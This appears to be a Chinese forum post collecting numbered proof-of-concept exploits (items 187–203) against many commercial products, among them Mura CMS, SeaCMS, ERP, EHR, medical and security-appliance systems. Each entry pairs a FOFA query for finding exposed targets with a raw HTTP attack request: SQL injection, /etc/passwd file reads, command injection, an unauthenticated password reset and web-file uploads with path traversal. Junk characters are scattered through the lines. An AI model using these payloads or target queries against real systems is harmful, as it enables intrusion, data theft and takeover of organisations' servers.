F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
7 s, w8 x) Y6 ^% C- k, x4 f0 ~FOFA:title=="DataCube3"/ K" r7 R& p! g, g
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1 m j. E+ k' z5 S
Host: your-ip
$ u; k: X/ ^% B$ P2 `- b! B' b' `' q3 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
6 m `, v- `- L$ A7 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
4 N: z7 r/ m6 _& P; |3 C) [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. _4 c" h# E1 H2 _8 g' Y7 g1 S
Accept-Encoding: gzip, deflate! ?. M5 Z# Y1 g8 b
Connection: close- v) r1 G* @7 O, w) ]
Content-Type: application/x-www-form-urlencoded' a( I; Y, l0 @% a( @
* H1 i. d+ [# @/ creq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450) E7 B2 m5 o2 s9 ]" C, q
, x3 w0 B' a1 w. H; O0 J
_* h0 \+ W' X5 Z
187. Mura CMS processAsyncObject SQL注入' w1 t. Q1 e* Q& e. ?
CVE-2024-32640
1 b: R# Q4 r5 n0 A" k* ~4 a4 fFOFA:"Mura CMS"
5 V0 z1 H% N8 U8 Q( FPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.17 Y8 {: e! |" j9 k5 d
Host: your-ip! x! N; p. h' G! ^7 h" d9 C
Content-Type: application/x-www-form-urlencoded' [# p% A+ l9 P D3 `% C
2 c3 l: y! l. \" W
4 P# ?+ q/ L9 [& Lobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
0 m+ h; A1 K+ ^% U" A! a z, o! W+ K* U2 Q
0 y6 n+ J. F! l* L6 n% b# L
188. 叁体-佳会视频会议 attachment 任意文件读取/ x, _1 G$ D7 L# q; g8 E; c: Q' J
version <= 3.9.7
! Y/ V$ I2 P" _6 X7 PFOFA:body="/system/get_rtc_user_defined_info?site_id"6 \& Z) T" k- |, _3 I* k5 p
GET /attachment?file=/etc/passwd HTTP/1.1# D$ M( D- ?+ }. R. i: L
Host: your-ip( Q! R7 u6 B+ b+ ^. U9 J* _2 F b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
3 ]8 c, A, f& S% S2 a. B" e# NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. K3 O1 x5 f& s
Accept-Encoding: gzip, deflate
2 _- c* J, z* _9 k* n# V4 lAccept-Language: zh-CN,zh;q=0.9,en;q=0.8* x( ~1 T5 `+ R6 C) U
Connection: close0 _6 ?4 y) j9 D
6 J5 q+ C0 P$ m F- Z
2 E+ O$ Q. ^3 u$ y/ i* e
189. 蓝网科技临床浏览系统 deleteStudy SQL注入& W4 E; x. J+ G- I% O* w
FOFA:app="LANWON-临床浏览系统"
) R4 q1 ]" p: ]- tGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1+ j0 T- n2 L& ~0 E/ \1 S+ T" c
Host: your-ip; i4 S2 f! g1 c; K
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 D) V# [. p+ N3 n5 [ a% P/ v% mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 f v9 K) y* F; U' L+ i
Accept-Encoding: gzip, deflate
; D9 G3 E! T8 a0 M6 U& M$ Y: Z( h, HAccept-Language: zh-CN,zh;q=0.98 M0 W) w# w+ H9 e
Connection: close7 d' m. \6 d) R: n; `
# F- }: u, `. {) I! |& e& z
+ C- r" g; [4 U190. 短视频矩阵营销系统 poihuoqu 任意文件读取# l+ A3 p; }5 Z1 ]% O4 Y
FOFA:title=="短视频矩阵营销系统"
. `1 ]/ [/ X9 E* ?& z# i3 zPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
5 R8 P# s$ T0 `6 O. {, _# b ^Host: your-ip
, L( B, `1 I0 a8 L7 x2 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.361 ]* U1 e W! C1 M, i4 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) @3 z3 x7 G( x9 m0 q) Z8 A3 AContent-Type: application/x-www-form-urlencoded u( U' d' n( h
Accept-Encoding: gzip, deflate
1 A1 d% r5 c! ]Accept-Language: zh-CN,zh;q=0.90 Y8 ^4 I8 p4 p0 d, P
$ I5 S% g8 ?. M7 n3 _ c
poi=file:///etc/passwd
' P4 l( t9 `9 M6 _ e
0 V0 s+ M- Y; N; Z( Z# D; ]/ C6 R9 W! I( V0 s
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入) k. E$ o2 n4 j4 A
FOFA:body="/CDGServer3/index.jsp". w+ b6 T5 i; P! @
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
2 p) U7 m! @) a7 p# E* EHost: your-ip( ?- s# D L) ?' N, }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ T1 B# t) b) B
Content-Type: application/x-www-form-urlencoded
$ l# w }5 l) j9 r) `4 N1 z1 b2 V' c p j+ P8 h1 h
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId= f' j" h, ]) I+ d# K
$ e. ~7 @; g6 j' I& ~3 v% k
$ ?) g2 R& {; L1 d192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
6 j' k$ C. R4 E+ ] @FOFA:title="用户登录_富通天下外贸ERP"+ j7 G- I& l1 W- }5 c! W
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
% }, q- H3 n2 B2 J9 nHost: your-ip$ i1 r3 ^7 a! H: ?0 E5 g! Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36: y$ @0 {+ ?+ d) e& C( U' o
Content-Type: application/x-www-form-urlencoded
J& T, m7 R0 }- D% ~" Y$ ]
' [! }* d3 l% N2 O/ {/ R. S! S
4 z c# l. Y: {! c* T; s1 o<% @ webhandler language="C#" class="AverageHandler" %>
3 O& }7 m; q( L T ?# U/ z& \using System;
. Q% ^2 e5 a1 E; Nusing System.Web;
3 \: c5 r4 d* S! @public class AverageHandler : IHttpHandler1 q/ n9 s8 n: c3 e. j, i
{( \( l7 t& c X2 B
public bool IsReusable
2 G1 Q! S- k: p, g* ]. y{ get { return true; } }2 o$ w, O1 W3 q8 _) r4 Z Y
public void ProcessRequest(HttpContext ctx)
4 L- q7 ?# ~1 G: `" ]{4 I0 ^4 M% Q5 f8 {& @
ctx.Response.Write("test");1 n0 _0 |% Y3 D9 k3 E% }% o
}4 v- b, s5 C b; p
}
, H. J2 ?6 y$ {! T
5 P7 L+ @; i" A* e# E+ W. `7 o" W
3 r# c. [. {$ J193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行' N8 U! p$ N: h3 r# R- A# f9 L
FOFA:body="山石云鉴主机安全管理系统"
3 a" z. e' o ?4 g# h3 JGET /master/ajaxActions/getTokenAction.php HTTP/1.1( ]* R$ B& Y; d; R b
Host:
) I) @8 Y4 j& Z# BCookie: PHPSESSID=2333333333333;
( c2 C; C1 _7 x; LContent-Type: application/x-www-form-urlencoded
) W# p s# x; i4 W5 vUser-Agent: Mozilla/5.0
3 H" O/ O0 s: }
7 V; O! u' e5 K# z! h( W1 M0 y6 q2 V9 k$ z
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.12 A6 T4 B7 R. c* I; m
Host:
4 G" w( Y* N; jUser-Agent: Mozilla/5.0, q2 S# a. ?5 e5 a `# x" E
Accept-Encoding: gzip, deflate- T1 q/ j% [% k) W' v) G# I9 M
Accept: */*
1 [& x7 h9 F5 f6 K, X% }$ KConnection: close3 H2 P6 B' I0 K) }4 k) p. B
Cookie: PHPSESSID=2333333333333;
5 ~: [( T A+ l* @Content-Type: application/x-www-form-urlencoded" u7 g' Z) F0 E$ j# x
Content-Length: 84! C) Y. P+ ?+ m" d% _
0 p$ Y$ L3 t& V& a" B- T
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')& B1 Y! I5 G5 s
; S. ^$ J+ Q* d5 T1 e b/ g- b
# [/ H/ ~2 w! l/ N3 J& B. jGET /master/img/config HTTP/1.1
5 j) ]( T3 L7 u) H3 w& r& h2 SHost:) k& s1 W& S1 }7 ?0 d$ F1 {: s
User-Agent: Mozilla/5.0$ s! V7 L/ }: m! w- J' l3 `
8 i" l; {4 H' S" ~' t5 H
3 J0 a. z; @" d" z, R5 X# C, k194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传1 s ]( \( j7 h' ~/ U) a; ~: g
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
2 u. J3 o& g5 V5 l3 \ ^
/ J+ X; ~$ {- W8 ^5 h/ f: \) EPOST /servlet/uploadAttachmentServlet HTTP/1.1
: h2 A: Y: z m+ HHost: host0 ^3 @" q7 A4 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36, u) f, T- c5 ^& z) R6 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" D. \7 W8 _- C0 ^* G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- c, M/ L7 Z. m/ w+ c
Accept-Encoding: gzip, deflate7 m$ B8 G( [1 k4 h, K
Connection: close8 S( ~% k4 j8 Z g
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk/ u* F! `# B( S( f% f; H
------WebKitFormBoundaryKNt0t4vBe8cX9rZk0 v m6 L8 S! q
/ B3 a) B: L1 l; x& W$ G8 X' gContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
?8 {0 v. w7 M7 x8 jContent-Type: text/plain
$ y# H. T0 R/ G, c/ v<% out.println("hello");%>5 x# r6 q* V4 f M# s& r! [2 J
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
9 n; ~. t) Q; NContent-Disposition: form-data; name="json"; U0 c' t* _; j
{"iq":{"query":{"UpdateType":"mail"}}}1 n6 K" W! U" \2 O |. ^6 V: u
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--9 N$ }0 ^8 @, i! G& A c/ _
6 ~ R2 C2 u2 A# ~
/ a( h" I1 l; r9 I Z0 r# l# Y
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
( p+ {8 A/ o; x1 G7 jFOFA:title=="飞鱼星企业级智能上网行为管理系统( [* Y4 c* T/ Q- k8 q
POST /send_order.cgi?parameter=operation HTTP/1.1
- X# t7 o3 H0 M3 cHost: 127.0.0.1
& j1 m$ G: ^# F8 U$ cPragma: no-cache
% z8 z6 c* }: R/ Q% a) d& \! I& E/ \* pCache-Control: no-cache
$ T6 ~, A9 ~8 P% kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
& V8 `2 t5 F# A& T2 [# dAccept: */*: \6 l5 Z1 }' W7 d
Accept-Encoding: gzip, deflate
* d* T# l: y! ]9 ~* f. m% y, JAccept-Language: zh-CN,zh;q=0.9
. G o# ]: d: S/ oConnection: close
" k: ]! i2 n* R; D/ QContent-Type: application/x-www-form-urlencoded
3 J" O; ^. d& \ BContent-Length: 686 m* p! @% d2 p- r8 ?$ C4 v
* X/ D' `8 f. |1 V
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
% I1 N# |3 M- z5 ], P: I# k6 X7 w, L$ ?/ T/ S$ C7 j' c4 z* v+ M0 X, E
9 ?" a6 d2 `" C+ E4 r3 H. s
196. 河南省风速科技统一认证平台密码重置# s% }- Y/ i& C! D) P1 e
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"! A. I9 K) w( O$ W! J1 q& l
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
1 W8 }+ e' ]! y" C- M6 _5 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# [/ B1 K9 @: T! _+ _Content-Type: application/json;charset=UTF-8% a9 S, T( }" \; Q
X-Requested-With: XMLHttpRequest
, K3 r/ s; e! w' nHost:1 U9 F3 E) ]. T4 `, c5 I7 o) D# k
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2# h7 b$ \! @' N/ j! X: _5 Z
Content-Length: 45
$ S8 Q; b( y% X6 f9 x) ?Connection: close
( V4 n. m. y1 w& X6 Y4 a+ W* t: h. F. p* c! `( m0 h* i
{"xgh":"test","newPass":"test666","email":""}
0 V3 N5 N% x) s, Z' G5 g, B1 |0 A: P' m5 Z7 H
3 a1 u& D) `8 P$ ?0 a) v+ T& ?. n' t2 M& z3 [
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入3 N, b6 T7 }2 H; B
FOFA:app="浙大恩特客户资源管理系统"
! r3 G% t% F0 _! u9 XGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.17 P8 Q4 |5 y- C
Host:' `2 u' D) U; _# L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.360 p4 L, D9 } A, C% d1 O
Accept-Encoding: gzip, deflate6 I/ q+ Z P, U2 ?5 Q) o
Connection: close/ z1 Z* D; C6 @7 K6 a7 n
0 H! V8 U$ j0 u% ^+ h
, e$ e) h1 w& }' b# p& H4 N
) ~) W+ x* \+ J3 u u9 g7 O
198. 阿里云盘 WebDAV 命令注入
% ^( t2 a+ {7 RCVE-2024-29640
- \; e J/ A! I" U" yGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1% Z! [0 J4 N) U d0 S: [) I; \
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
. X# D, d- i2 S' C# x" d9 _Accept: */*
( E# {* O5 e2 HAccept-Encoding: gzip, deflate0 U7 R/ T$ w9 u% W% @
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
7 w! y2 B6 i9 L. o) |Connection: close
. n2 Y! h5 x+ Z( g) h& n# B/ T) L/ [
9 L. v5 } J$ S
) e- H& B2 E3 |& I6 e; M% x199. cockpit系统assetsmanager_upload接口 文件上传
9 z- [: x+ h. h0 A
" R: {. n. x1 S% `! |+ W$ ~1 @1 f1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果: p6 I: A P: J' c) [; w8 Y
GET /auth/login?to=/ HTTP/1.1
R: A! t% C, X- t
A/ K6 k% x6 E, e响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"- r4 q/ `+ K& ?7 g: D8 |. ?
: I7 H0 n: Z2 b9 _* h
2.使用刚才上一步获取到的jwt获取cookie:! V' L/ p, v( O8 h* @
3 Q6 ~4 z+ x- y( B& }POST /auth/check HTTP/1.1) X4 b% e' \6 B4 u
Content-Type: application/json. `( }1 b5 ?6 F4 {: O6 L8 u* d
0 O/ ?- h( Q- O, s5 i2 o
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
9 {- W* d$ |. b' U& B- k( }+ ]& R! \; a' y- P% _$ @9 W1 M$ t
响应:200,返回值:) x3 ]- _: b l/ `
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/$ ]" ?7 b9 y3 G5 A- z0 @0 ~) A% w
Fofa:title="Authenticate Please!"
- c% l- c. \. B1 pPOST /assetsmanager/upload HTTP/1.17 |+ P$ O5 c7 C& T7 Q+ |6 h: c( Y2 c
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
4 }1 F$ _: Z7 y; r8 D/ _5 bCookie: mysession=95524f01e238bf51bb60d77ede3bea92
^: c& ~% v9 l1 a, e" g2 y8 a1 r1 Z8 D
-----------------------------36D28FBc36bd6feE7Fb3
& `# o8 {) W1 Y. |* y6 D) `2 FContent-Disposition: form-data; name="files[]"; filename="tttt.php"0 [1 V3 a2 M# A, N
Content-Type: text/php
4 n. C5 E# W5 |2 I8 R2 k
5 n6 _ ~' N# B: Y/ k: j, A' a<?php echo "tttt";unlink(__FILE__);?>
3 G' Z0 A/ l4 X- B6 m-----------------------------36D28FBc36bd6feE7Fb30 ^0 ^# u; ?5 S! F
Content-Disposition: form-data; name="folder"
/ [6 B+ i+ S& W) ^# I: K! G
9 X( j5 t- u* p. { m; a-----------------------------36D28FBc36bd6feE7Fb3--' b- z- s' J) X, u
' {; v5 [* j% ^. p; m: Y
1 A5 L- i1 X3 _" X" o( D2 A/storage/uploads/tttt.php! K! f" m, ?+ J0 D" H# d
3 ?1 k0 X- M% Q \8 q
200. SeaCMS海洋影视管理系统dmku SQL注入( I9 ?. ?/ H! m) |6 w; l
FOFA:app="海洋CMS"7 I/ c0 d; q9 i0 G; A* ]
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1% M" a4 Q* e( r$ V
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s+ ]$ b' ~% {3 h4 P- L) w4 ]# X5 e
Upgrade-Insecure-Requests: 1
- @ T3 d) g$ H& ^Cache-Control: max-age=0
* i, l! ^- [/ hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 N e7 D# G, F& Z9 AAccept-Encoding: gzip, deflate
( l) r* m1 S2 `3 z# L- @Accept-Language: zh-CN,zh;q=0.9
% o8 q* q- _1 j' F9 v& }& |
; W/ s: g7 H+ d, t, f$ ?3 ~' N, V/ L# \$ K& M
201. 方正全媒体新闻采编系统 binary SQL注入
: s' [+ o; V# H* f4 d- nFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"6 R! Y, t: v; C/ {' j( y0 X$ P3 P
POST /newsedit/newsplan/task/binary.do HTTP/1.1
# V# w6 ^6 z5 P0 kContent-Type: application/x-www-form-urlencoded
2 ?7 D, ~1 Y+ w4 v0 ?3 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
m: e: i! B( ]' N$ Y; `Accept-Encoding: gzip, deflate+ O8 U+ N& |& U6 G; t
Accept-Language: zh-CN,zh;q=0.9+ {/ v4 t. @+ G7 z: x5 q
Connection: close
+ O, d+ O+ M' `+ |, f8 }/ z& ~* A& o3 ^9 ? o% U8 |, t
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=14 t# n. k, d; Z" p
* g- |& j% x/ V. V& R6 e, U
/ i& ^4 A4 L/ b* c! m/ r9 u
202. 微擎系统 AccountEdit任意文件上传- q0 C' y* Y( M/ V( W4 N
FOFA:body="/Widgets/WidgetCollection/"& m" f9 n# z2 k
获取__VIEWSTATE和__EVENTVALIDATION值4 n0 f1 H$ A+ ? W$ g/ r' m0 J
GET /User/AccountEdit.aspx HTTP/1.1
0 |2 N( b2 d* c Q1 T c* L1 v) KHost: 滑板人之家. A# \' Y4 U' |; q Z" y! O- R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
! W9 u$ j3 }4 z- }$ w9 w) C6 OContent-Length: 0! f+ W! T8 u5 k; x( J
* N4 s- S7 [0 @1 b4 i6 ~
$ U/ B9 v# u( Z/ {! U
替换__VIEWSTATE和__EVENTVALIDATION值, H+ |5 _5 Y7 F- s
POST /User/AccountEdit.aspx HTTP/1.19 v3 z# z5 v* ~2 p4 w
Accept-Encoding: gzip, deflate, br8 h V! z& v$ ^- B! T+ s
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
]' Q* V# D( Y- D% J* B3 M9 r/ {: `7 Y. d( T
-----------------------------786435874t38587593865736587346567358735687
$ J6 f2 A3 {* a: q, _2 PContent-Disposition: form-data; name="__VIEWSTATE"
7 \# r3 j* k, N& p1 c, V/ k" X/ t) `( ^, Q5 T1 U5 y8 h6 B {8 {. ]4 C/ [
__VIEWSTATE8 C- \5 \0 T, _1 q& }$ h
-----------------------------786435874t385875938657365873465673587356871 _) v o. ?* |+ v' m( S) {/ J8 j
Content-Disposition: form-data; name="__EVENTVALIDATION"! u' {/ V. o- V, R: {( y
' w; W+ A2 v; @
__EVENTVALIDATION# M. S3 ]+ X3 G g
-----------------------------786435874t38587593865736587346567358735687' M1 w" U$ T+ \. g$ J+ t G' r
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"% H% }& W: B& z/ c
Content-Type: text/plain
5 K9 K M# U( B6 `0 F5 I3 ^
) Z! Z* ~9 M$ g! \3 oHello World!+ R: x/ |* @* g, S
-----------------------------786435874t38587593865736587346567358735687& W$ O! ?8 z7 f+ R
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"; s) h5 D/ M7 f& B3 O
# m# |1 e& W& W3 S( X S上传图片
( `# ]0 _' q @6 y" l-----------------------------786435874t38587593865736587346567358735687) Q, s8 x. P ]7 ~+ i' `
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
2 B( I3 N& h9 j- j* ?
2 U+ P" ~ H' M% V5 D
$ M, s# A: o' B9 p+ M-----------------------------786435874t38587593865736587346567358735687) t/ v5 a- ^: Y# _. Y/ C
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
e& L. \( x. s( {( w
/ x M+ o! ]: v) H7 L! `9 X% L
# g' ^7 d, {0 _) z3 E2 p/ Z E6 T-----------------------------786435874t38587593865736587346567358735687--
/ _# I ]+ t2 z
$ C, ?7 @; d6 U* J* F+ W
2 @% o, y5 w5 h p/_data/Uploads/1123.txt4 M- }* v) q9 J9 u
' J/ F$ q, X, K6 j' x4 X7 a203. 红海云EHR PtFjk 文件上传* ]& \1 }9 K- e1 d0 {/ \. D
FOFA:body="RedseaPlatform"
% k2 b. p- d' J! q3 {" IPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1* S) z, T) ]& ?$ d$ V$ d( A. ?" t
Host: x.x.x.x' U5 u- L+ K+ d" z3 N% _5 Y
Accept-Encoding: gzip* w, N' ^* {8 C) M4 ~( y, R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 m+ ~2 F* ]7 GContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4: Y2 D. G) |2 N& E4 x/ e
Content-Length: 210
P( ]! |5 y) f$ r
# d. d( {! i' B, Q- F' U6 ?: s) S------WebKitFormBoundaryt7WbDl1tXogoZys41 y: F$ p5 z F+ k9 o
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
& }- C1 B) h" x' a3 X) v4 PContent-Type:image/jpeg
, K" B+ x: J7 b" z. x D) B8 u/ j0 F+ {3 I
<% out.print("hello,eHR");%>
" Z& D7 V% d; l------WebKitFormBoundaryt7WbDl1tXogoZys4--
, G. C' Q& D( V
" z7 G2 A. v& Q4 ? n/ I) T } 1 n1 L. _" e1 s7 O, u. r
1 X; T5 @$ U1 o7 n5 x' }
$ f: t+ [2 D) g5 [
/ v/ ^& j2 G8 j/ x9 z5 n
0 \; t2 P$ l" A |
发表于 2024-6-5 14:31:29
收藏
支持
反对